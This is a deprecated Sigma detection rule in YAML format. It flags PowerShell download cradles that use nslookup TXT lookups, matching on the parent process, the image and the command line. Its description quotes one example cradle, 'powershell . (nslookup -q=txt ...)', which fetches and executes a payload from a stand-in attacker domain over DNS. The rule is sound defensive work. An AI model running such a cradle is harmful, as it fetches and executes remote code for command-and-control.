title: Nslookup PwSh Download Cradle
id: 0fe17ad1-f2a1-30b1-930e-9f4fc1485a7e
related:
    - id: 72671447-4352-4413-bb91-b85569687135
      type: derived
status: deprecated
description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
references:
    - https://twitter.com/alh4zr3d/status/1566489367232651264
author: Zach Mathis (@yamatosecurity)
date: 2022/09/06
modified: 2022/12/14
tags:
    - attack.command-and-control
    - attack.t1105
    - attack.t1071.004
    - sysmon
logsource:
    category: process_creation
    product: windows
detection:
    process_creation:
        EventID: 1
        Channel: Microsoft-Windows-Sysmon/Operational
    selection:
        ParentImage|endswith: \powershell.exe
        Image|contains: nslookup
        CommandLine|contains: '=txt '
    condition: process_creation and selection
level: medium
ruletype: Sigma
